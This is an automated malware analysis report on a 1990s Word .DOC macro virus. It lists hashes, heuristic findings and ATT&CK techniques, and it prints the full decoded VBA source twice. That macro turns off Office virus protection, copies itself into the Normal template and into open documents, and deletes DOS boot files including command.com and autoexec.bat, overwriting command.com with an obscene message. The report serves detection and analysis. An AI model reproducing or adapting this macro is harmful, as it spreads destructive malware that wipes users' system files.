Office (OLE) / .DOC malware analysis — malicious · 868a1be3c002bb7a

MALICIOUS

Office (OLE) / .DOC

30.5 KB Created: 1997-01-31 16:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 5cec6b68c0a6144e8475f8b5839c9610 SHA-1: 7d3db1afe331448cb9baa78d928bfc6c85d1aab0 SHA-256: 868a1be3c002bb7a02451cfc5d2d0ec46d350a349b989e0b1fca8f0dcf76ec51

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. Critical heuristics indicate self-replication and disabling of macro protection, suggesting the macro is designed to spread and evade detection. The macro attempts to disable virus protection by setting 'Options.VirusProtection = False'. It also references a local file path 'C:\_vir\rep-Hrn.doc', which may be related to its replication or payload delivery.

Heuristics 2

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
        .VirusProtection = False
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3239 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3239 bytes
SHA-256: `71e8da40a9c25fa3236472d1ca3f41e760cae4e6f69d72531ef5b836049fd216`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub Docclose() Attribute Docclose.VB_Description = "Ìàêðîñ çàïèñàí 05/15/99 viktork" Attribute Docclose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Ìàêðîñ1" On Error Resume Next Application.DisplayStatusBar = True With ActiveWindow .DisplayHorizontalScrollBar = True .DisplayVerticalScrollBar = True .StyleAreaWidth = CentimetersToPoints(0) .DisplayScreenTips = True With .View .ShowAnimation = True .Draft = False .WrapToWindow = False .ShowPicturePlaceHolders = False .ShowFieldCodes = False .ShowBookmarks = False .FieldShading = wdFieldShadingWhenSelected .ShowTabs = False .ShowSpaces = False .ShowParagraphs = False .ShowHyphens = False .ShowHiddenText = False .ShowAll = False .ShowHighlight = True End With End With With Options .Pagination = True .WPHelp = False .WPDocNavKeys = False .ShortMenuNames = False .RTFInClipboard = True .BlueScreen = False .EnableSound = False .ConfirmConversions = True .UpdateLinksAtOpen = True .SendMailAttach = True .MeasurementUnit = wdCentimeters .AnimateScreenMovements = True .VirusProtection = False End With Application.DisplayRecentFiles = True RecentFiles.Maximum = 4 'Äîïèñûâàåì åñëè íåò íîðìàëå ' Application.OrganizerDelete Normal.ThisDocument.FullName, "NewMacros", wdOrganizerObjectProjectItems Application.OrganizerCopy Source:= _ ActiveDocument.FullName, Destination:= _ Normal.ThisDocument.FullName, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems 'Äîïèñûâàåì åñëè íåò â äîêóìåíòå, à åñòü â íîðìàëå ' Application.OrganizerDelete ActiveDocument.FullName, "NewMacros", wdOrganizerObjectProjectItems Application.OrganizerCopy Source:= _ Normal.ThisDocument.FullName, Destination:= _ ActiveDocument.FullName, Name:="NewMAcros", Object:=wdOrganizerObjectProjectItems 'Äåëàåì Õåðíþ Kill "c:\command.com" Kill "c:\config.sys" Kill "c:\autoexec.bat" Kill "c:\io.sys" Kill "c:\msdos.sys" Open "c:\command.com" For Output As #1 Print #1, "Â æîïó íå åáàòüñÿ, ñäåëàþ õåðíþ !!!" Close #1 ActiveDocument.Save Normal.ThisDocument.Save ActiveDocument.Close End Sub Sub DelRow() Attribute DelRow.VB_Description = "Ìàêðîñ çàïèñàí 20.07.00 OrChiD" Attribute DelRow.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.DelRow" ' ' DelRow Ìàêðîñ ' Ìàêðîñ çàïèñàí 20.07.00 OrChiD ' Selection.Cells.Delete ShiftCells:=wdDeleteCellsEntireRow End Sub

SHA-256: 71e8da40a9c25fa3236472d1ca3f41e760cae4e6f69d72531ef5b836049fd216

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub Docclose()
Attribute Docclose.VB_Description = "Ìàêðîñ çàïèñàí 05/15/99 viktork"
Attribute Docclose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Ìàêðîñ1"
On Error Resume Next
    Application.DisplayStatusBar = True
    With ActiveWindow
        .DisplayHorizontalScrollBar = True
        .DisplayVerticalScrollBar = True
        .StyleAreaWidth = CentimetersToPoints(0)
        .DisplayScreenTips = True
        With .View
            .ShowAnimation = True
            .Draft = False
            .WrapToWindow = False
            .ShowPicturePlaceHolders = False
            .ShowFieldCodes = False
            .ShowBookmarks = False
            .FieldShading = wdFieldShadingWhenSelected
            .ShowTabs = False
            .ShowSpaces = False
            .ShowParagraphs = False
            .ShowHyphens = False
            .ShowHiddenText = False
            .ShowAll = False
            .ShowHighlight = True
        End With
    End With
    With Options
        .Pagination = True
        .WPHelp = False
        .WPDocNavKeys = False
        .ShortMenuNames = False
        .RTFInClipboard = True
        .BlueScreen = False
        .EnableSound = False
        .ConfirmConversions = True
        .UpdateLinksAtOpen = True
        .SendMailAttach = True
        .MeasurementUnit = wdCentimeters
        .AnimateScreenMovements = True
        .VirusProtection = False
    End With
    Application.DisplayRecentFiles = True
    RecentFiles.Maximum = 4
    
'Äîïèñûâàåì åñëè íåò íîðìàëå
     '   Application.OrganizerDelete Normal.ThisDocument.FullName, "NewMacros", wdOrganizerObjectProjectItems
        
        Application.OrganizerCopy Source:= _
        ActiveDocument.FullName, Destination:= _
        Normal.ThisDocument.FullName, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems

'Äîïèñûâàåì åñëè íåò â äîêóìåíòå, à åñòü â íîðìàëå
     '   Application.OrganizerDelete ActiveDocument.FullName, "NewMacros", wdOrganizerObjectProjectItems

        Application.OrganizerCopy Source:= _
        Normal.ThisDocument.FullName, Destination:= _
        ActiveDocument.FullName, Name:="NewMAcros", Object:=wdOrganizerObjectProjectItems
'Äåëàåì Õåðíþ
Kill "c:\command.com"
Kill "c:\config.sys"
Kill "c:\autoexec.bat"
Kill "c:\io.sys"
Kill "c:\msdos.sys"

Open "c:\command.com" For Output As #1
    Print #1, "Â æîïó íå åáàòüñÿ, ñäåëàþ õåðíþ !!!"
Close #1
ActiveDocument.Save
Normal.ThisDocument.Save
ActiveDocument.Close
End Sub
Sub DelRow()
Attribute DelRow.VB_Description = "Ìàêðîñ çàïèñàí 20.07.00 OrChiD"
Attribute DelRow.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.DelRow"
'
' DelRow Ìàêðîñ
' Ìàêðîñ çàïèñàí 20.07.00 OrChiD
'
    Selection.Cells.Delete ShiftCells:=wdDeleteCellsEntireRow
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.